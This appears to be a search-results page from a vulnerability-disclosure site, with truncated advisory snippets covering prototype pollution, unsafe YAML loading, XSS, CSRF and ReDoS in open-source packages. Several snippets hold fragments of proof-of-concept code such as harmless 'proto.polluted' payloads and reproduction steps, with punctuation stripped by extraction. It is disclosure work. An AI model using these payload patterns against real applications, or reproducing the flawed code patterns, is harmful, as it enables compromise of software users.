4057 matches found
Code Injection in tensorflow/models
Description Arbitrary Code Execution in Tensorflow/Models. The TensorFlow Model Garden is a repository with a number of different implementations of state-of-the-art (SOTA) models and modeling solutions for TensorFlow users. We aim to demonstrate the best practices for modeling so that TensorFlow...
Prototype Pollution in bonnevoyager/nested-objects-util
Description nested-objects-util is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var unflatten = require"nested-objects-util" console.log"Before : " + .polluted; unflatten"proto.polluted": "Yes! Its Polluted" console.log"After : " + .polluted; 2...
Code Injection in ultralytics/yolov5
Description Arbitrary Code Execution in ultralytics/yolov5. Yolov5 is an Object Detection model from Ultralytics. Ultralytics is a U.S.-based particle physics and AI startup with over 6 years of expertise supporting government, academic and business clients. Ultralytics offer a wide range of visi...
Prototype Pollution in rodrigocmoreira/sgt-fields
Description sgt-fields is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var sgtFields = require"sgt-fields" var obj = console.log"Before : " + .polluted; sgtFields.setobj,"proto.polluted","Yes! Its Polluted"; console.log"After : " + .polluted; 2...
Code Injection in zqpei/deep_sort_pytorch
Description Arbitrary Code Execution in deepsort built on pytorch. MOT tracking using deepsort and yolov3 with pytorch. Technical Description This package was vulnerable to Arbitrary code execution due to a use of a known vulnerable function load in yaml. All the scripts importing utils/parser.p...
Prototype Pollution in patrickleet/expand-keys
Description expand-keys is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var expandKeys = require"expand-keys" console.log"Before : " + .polluted; expandKeys"proto.polluted": "Yes! Its Polluted" console.log"After : " + .polluted; 2. Execute the...
Code Injection in mozilla/deepspeech
Description Arbitrary Code Execution in mozilla/DeepSpeech. DeepSpeech is an open source embedded offline, on-device speech-to-text engine which can run in real time on devices ranging from a Raspberry Pi 4 to high power GPU servers. Technical Description This package was vulnerable to Arbitrary...
in nvidia/runx
Description runx is a Deep Learning Experiment Management library by NVIDIA. This package was vulnerable to Arbitrary code execution via Insecure YAML deserialization due to the use of a known vulnerable function load in yaml. repo: https://github.com/NVIDIA/runx Proof of Concept python...
Code Injection in microsoft/nni
Description Arbitrary Code Execution in microsoft/nni. An open source AutoML toolkit to automate the machine learning lifecycle, including feature engineering, neural architecture search, model compression and hyper-parameter tuning. Technical Description This package was vulnerable to Arbitrary co...
Code Injection in svaarala/duktape
Description Arbitrary Code Execution in svaarala/duktape/tools/genconfig.py. Duktape - embeddable Javascript engine with a focus on portability and compact footprint. Genconfig processes Duktape option metadata and produces various useful outputs. Technical Description This package was...
Code Injection in microsoft/qlib
Description Arbitrary Code Execution in microsoft/qlib. Qlib is an AI-oriented quantitative investment platform, which aims to realize the potential, empower the research, and create the value of AI technologies in quantitative investment. Technical Description This package was vulnerable to...
Code Injection in ultralytics/yolov3
Description Arbitrary Code Execution in ultralytics/yolov3. Yolov3 is a model from Ultralytics. Ultralytics is a U.S.-based particle physics and AI startup with over 6 years of expertise supporting government, academic and business clients. Ultralytics offer a wide range of vision AI services,...
Prototype Pollution in badopcode/nodash
Description ts-nodash is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var merge = require"ts-nodash".Merge const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " + .polluted; mergeobj, payload;...
Cross-site Scripting (XSS) - Generic in apexcharts/apexcharts.js
Description apexcharts is vulnerable to Cross-Site Scripting XSS. Proof of Concept 1. Install the package by following this instruction https://apexcharts.com/docs/installation/ or try the live sandbox here https://codepen.io/apexcharts/pen/xYqyYm 2. Edit JS and insert the XSS payload below in th...
Prototype Pollution in asaianudeep/deep-override
Description deep-override is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var deepOverride = require"deep-override" const payload = JSON.parse'"proto":"polluted":"Yes! Its Polluted"'; var obj = console.log"Before : " + .polluted; deepOverrideobj,...
Cross-site Scripting (XSS) - Generic in igniterealtime/openfire-bookmarks-plugin
Description openfire-bookmarks-plugin is vulnerable to Cross-Site Scripting XSS. Steps To Reproduce 1. Download openfire and install https://www.igniterealtime.org/downloads/ 2. Run the server http://localhost:9090/index.jsp 3. Click on "Plugins" http://localhost:9090/plugin-admin.jsp and install...
Cross-Site Request Forgery (CSRF) in strider-cd/strider
Description Strider is an Open Source Continuous Deployment / Continuous Integration platform. It is written in Node.js and Ember.js and uses MongoDB as a backing store. This platform is vulnerable to Cross-Site Request Forgery CSRF. It allows an attacker to take over accounts, privilege...
Prototype Pollution in ionicabizau/set-or-get.js
Description set-or-get is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var SetOrGet = require"set-or-get"; var obj = console.log"Before : " + .polluted; SetOrGetobj, "proto", .polluted ='Yes! Its Polluted'; console.log"After : " + .polluted; 2...
Prototype Pollution in ionicabizau/obj-unflatten
Description obj-unflatten converts flattened objects into nested ones. This package is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: javascript // poc.js const unflatten = require'obj-unflatten' console.log'Before: ' + .polluted unflatten'proto.polluted':...
Prototype Pollution in mout/mout
Description mout is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC file: // poc.js var mout = require"mout" var obj = console.log"Before : " + .polluted; mout.object.setobj,'proto.polluted','Yes! Its Polluted'; console.log"After : " + .polluted; 2. Execute the...
Prototype Pollution in steveukx/properties
Description properties-reader is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC and INI files: // poc.js var propertiesReader = require'properties-reader'; console.log"Before : " + .polluted console.log"Before : " + .polluted1 var properties =...
Prototype Pollution in evangelion1204/multi-ini
Description multi-ini is vulnerable to Prototype Pollution. Proof of Concept 1. Create the following PoC and INI files: // poc.js const ini = require'multi-ini'; console.log"Before : " + .polluted; var content = ini.read'./payload.ini'; console.log"After : " + .polluted; //payload.ini constructor...
Prototype Pollution in nodef/extra-object
Description extra-object is vulnerable to Prototype Pollution. This package allows for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var extraObject = require"extra-object" var obj =...
Business Logic Errors in braitsch/node-login
Description node-login is a template for quickly building login systems on top of Node.js & MongoDB. The business logic which updates account details fails to verify if the provided email is associated with another account. Proof of Concept 1. Navigate to /signup and Create two accounts with data...
Cross-site Scripting (XSS) - Generic in thirtybees/thirtybees
Description Thirty bees is a matured e-commerce solution which once started as a fork of PrestaShop 1.6.1.11 and is still compatible with almost all PS 1.6 modules. Its focus is on stability, correctness and reliability of the rich feature set, to allow merchants to focus on growing their business...
Cross-site Scripting (XSS) - Generic in s-cart/core
Description s-cart is a free e-commerce website project for businesses, built on the Laravel framework. This package is vulnerable to Stored Cross-Site Scripting XSS. https://github.com/s-cart/s-cart https://s-cart.org/about.html Steps To Reproduce-: 1 install https://github.com/s-cart/s-cart...
Code Injection in jadonk/bonescript
Overview BoneScript is a node.js library for physical computing on embedded Linux, starting with support for BeagleBone. Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbitrary commands by using a semicolon char in the setDate function. Proof of...
Prototype Pollution in mozilla/node-convict
Description convict is vulnerable to Prototype Pollution. This package allows for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var convict = require"convict"; var obj = ; var config =...
Prototype Pollution in b-heilman/bmoor
Description bmoor is vulnerable to Prototype Pollution. This package allows for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js const bmoor = require'bmoor'; var obj = console.log"Before : " ...
Prototype Pollution in maikelvl/dot-json
Description dot-json is vulnerable to Prototype Pollution. This package allows for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var dotJson = require"dot-json" var myfile = new...
Cross-site Scripting (XSS) - Generic in frappe/charts
Description frappe-charts is vulnerable to Cross-Site Scripting XSS. Steps To Reproduce 1. Open NPM repo https://www.npmjs.com/package/frappe-charts 2. Open the Explore demos https://frappe.io/charts 3. At the bottom find the sandbox Ref:...
Prototype Pollution in imrefazekas/assign.js
Description assign.js is vulnerable to Prototype Pollution. This package allows for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var Assigner = require"assign.js" var assigner = new Assign...
Prototype Pollution in okunishinishi/node-objnest
Description objnest is vulnerable to Prototype Pollution. This package allows for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var objnest = require"objnest" console.log"Before : " +...
Prototype Pollution in generates/generates
Description @generates/merger is vulnerable to Prototype Pollution. This package allows for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var merger = require"@generates/merger" const paylo...
Prototype Pollution in jquense/yup
Description yup is vulnerable to Prototype Pollution. This package allows for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js let yup = require'yup'; const payload =...
Prototype Pollution in coderaiser/nessy
Description nessy is vulnerable to Prototype Pollution. This package allows for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var nessy = require"nessy" var obj = console.log"Before : " +...
Prototype Pollution in sonnyp/json8
Description json8-patch is vulnerable to Prototype Pollution. This package allows for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var json8Patch = require"json8-patch" var obj = const pat...
Prototype Pollution in sonnyp/json8
Description json8-pointer is vulnerable to Prototype Pollution. This package allows for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var json8Pointer = require"json8-pointer"...
Cross-site Scripting (XSS) - Generic in alibaba/bizcharts
Description bizcharts is vulnerable to Cross-Site Scripting XSS. Steps To Reproduce-: 1. Open NPM repo https://www.npmjs.com/package/bizcharts 2. Open the demo https://bizcharts.net/product/BizCharts4/gallery 3. Select any chart (I used pie chart) Ex: https://bizcharts.net/product/BizCharts4/demo/37...
in microweber/microweber
Description microweber/microweber is vulnerable to Arbitrary File Upload. Effective controls have not been implemented to restrict users from uploading malicious content to the web server. Files containing code like .php, .exe and etc can be uploaded successfully. Steps To Reproduce-: 1. Login in...
Denial of Service in locutusjs/locutus
Description locutus is vulnerable to ReDoS. The regular expression at src/php/network/inetpton.js:24 is vulnerable to ReDoS. It is possible to cause increasing slow-downs which lock the event loop by passing strings which have some number of repeating a characters followed by a . character. For...
Prototype Pollution in yargs/y18n
Description y18n is vulnerable to Prototype Pollution. This package allows for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js const y18n = require'y18n'; var obj = console.log"Before : " +...
Prototype Pollution in starcounter-jack/json-patch
Description fast-json-patch is vulnerable to Prototype Pollution. This package allows for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js let fastjsonpatch = require"fast-json-patch"; functio...
Prototype Pollution in sagold/gson-query
Description gson-query is vulnerable to Prototype Pollution. This package allows for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following PoC file: js // poc.js var gsonQuery = require"gson-query" var obj =...
Cross-site Scripting (XSS) - Generic in dolibarr/dolibarr
Description The application is vulnerable to html injection in password reset functionality. PoC CLICK ME...
Prototype Pollution in yeikos/js.merge
Overview merge is used to merge multiple objects into one object. Affected versions of this package are vulnerable to Prototype Pollution via the merge.recursive function. It can be tricked into adding or modifying properties of the Object prototype. These properties will be present on all object...
in seleniumhq/selenium
Description Selenium is an umbrella project encapsulating a variety of tools and libraries enabling web browser automation. Selenium specifically provides infrastructure for the W3C WebDriver specification — a platform and language-neutral coding interface compatible with all major web browsers...
Prototype Pollution in liriliri/licia
Description licia package is vulnerable to prototype pollution issue files can be found in https://github.com/liriliri/licia/blob/master/src/e/extendDeep.js & https://github.com/liriliri/licia/blob/master/src/s/safeSet.jsL46 Proof of Concept 1. Creating poc filed js var utils = require'licia'; va...
Prototype Pollution in pierreinglebert/json-merge-patch
Description json-merge-patch is vulnerable to Prototype Pollution. This package fails to restrict access to prototypes of objects, allowing for modification of prototype behavior using a proto payload, which may result in Information Disclosure/DoS/RCE. Proof of Concept 1. Create the following Po...
Prototype Pollution in mariocasciaro/object-path
Overview object-path is a tiny JavaScript utility to access deep properties using a path for Node and the Browser. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be...